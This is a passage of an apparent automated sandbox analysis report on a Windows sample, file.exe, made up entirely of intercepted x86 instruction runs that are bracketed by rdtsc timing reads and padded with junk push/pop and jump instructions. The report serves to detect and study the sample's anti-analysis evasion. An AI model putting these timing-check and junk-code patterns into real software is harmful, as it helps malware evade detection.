                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C4F8 second address: 125C509 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFEB91CA546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C509 second address: 125C50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C50E second address: 125C514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C514 second address: 125C51A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125C7CC second address: 125C7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125F68F second address: 125F6AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12655DC second address: 12655E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263F99 second address: 1263FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263FA8 second address: 1263FCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 jmp 00007EFEB91CA558h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263FCA second address: 1263FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264174 second address: 1264197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007EFEB91CA557h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264197 second address: 12641A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12641A2 second address: 12641A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264307 second address: 1264337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jno 00007EFEB92DE1E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jp 00007EFEB92DE1E6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop edi 0x0000001b jmp 00007EFEB92DE1EDh 0x00000020 push eax 0x00000021 push edx 0x00000022 jns 00007EFEB92DE1E6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264337 second address: 126433B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126433B second address: 126435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007EFEB92DE1F2h 0x0000000e je 00007EFEB92DE1E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264753 second address: 126475E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFEB91CA546h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264A4E second address: 1264A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F0h 0x00000009 jmp 00007EFEB92DE1F7h 0x0000000e js 00007EFEB92DE1E6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007EFEB92DE1E6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264FD4 second address: 1264FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264FDA second address: 1264FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264FE0 second address: 1264FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265453 second address: 1265463 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB92DE1E6h 0x00000008 jl 00007EFEB92DE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265463 second address: 1265472 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007EFEB91CA546h 0x0000000b pop edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268F0C second address: 1268F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268F10 second address: 1268F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268F14 second address: 1268F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFEB92DE1EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F26 second address: 1268F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F34 second address: 1268F71 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFEB92DE1E6h 0x00000008 jmp 00007EFEB92DE1F1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 je 00007EFEB92DE1E8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b jmp 00007EFEB92DE1F4h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A4DE second address: 122A4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A4E2 second address: 120FFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jne 00007EFEB92DE1ECh 0x0000000e call dword ptr [ebp+122D1AA0h] 0x00000014 pushad 0x00000015 pushad 0x00000016 jns 00007EFEB92DE1E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A59F second address: 122A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A5A3 second address: 122A5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A9C6 second address: 122A9D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007EFEB91CA546h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB9B second address: 122ABB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABB9 second address: 122ABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA54Ah 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFEB91CA557h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABED second address: 122ABF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADD3 second address: 122ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADD7 second address: 122ADE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADE8 second address: 122ADEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADEC second address: 122ADFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B068 second address: 122B07F instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB91CA548h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007EFEB91CA55Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B7F7 second address: 122B80C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B80C second address: 122B816 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CC80 second address: 126CC9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CDE0 second address: 126CE09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFEB91CA550h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007EFEB91CA548h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007EFEB91CA546h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CE09 second address: 126CE13 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D397 second address: 126D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007EFEB91CA54Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274326 second address: 127432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127432C second address: 1274332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274332 second address: 1274338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274338 second address: 1274347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFEB91CA54Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274347 second address: 1274376 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB92DE1EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007EFEB92DE1F7h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274376 second address: 12743A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFEB91CA550h 0x0000000b popad 0x0000000c jg 00007EFEB91CA559h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273123 second address: 127313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007EFEB92DE1F2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127313E second address: 1273152 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB91CA546h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007EFEB91CA546h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273152 second address: 1273156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127327B second address: 1273281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273281 second address: 1273290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12737E7 second address: 1273815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007EFEB91CA550h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007EFEB91CA54Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273815 second address: 127382E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127382E second address: 127383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1272E8C second address: 1272E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279917 second address: 127991B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279220 second address: 1279224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279224 second address: 127922E instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127922E second address: 1279234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279234 second address: 1279239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C029 second address: 127C02F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C02F second address: 127C038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C038 second address: 127C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jl 00007EFEB92DE1EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E66B2 second address: 11E66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12810A0 second address: 12810A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280573 second address: 1280579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B5 second address: 12864BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864BB second address: 12864C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864C1 second address: 12864C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864C6 second address: 12864E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFEB91CA559h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864E4 second address: 1286516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007EFEB92DE1EDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007EFEB92DE1F5h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007EFEB92DE1E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286516 second address: 128651A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128651A second address: 1286539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007EFEB92DE1E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286539 second address: 1286556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007EFEB91CA54Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128668B second address: 128668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128668F second address: 128669C instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128669C second address: 12866A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007EFEB92DE1E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12866A9 second address: 12866B8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286B26 second address: 1286B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286B2A second address: 1286B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007EFEB91CA546h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CC0 second address: 1286CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CC5 second address: 1286CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CD9 second address: 1286CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1EFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B2D3 second address: 122B2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B2D7 second address: 122B2E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287A67 second address: 1287AA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007EFEB91CA553h 0x0000000e pop ebx 0x0000000f jng 00007EFEB91CA558h 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A9B2 second address: 128A9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C28 second address: 1290C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C2C second address: 1290C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C30 second address: 1290C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C3A second address: 1290C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129122E second address: 1291234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
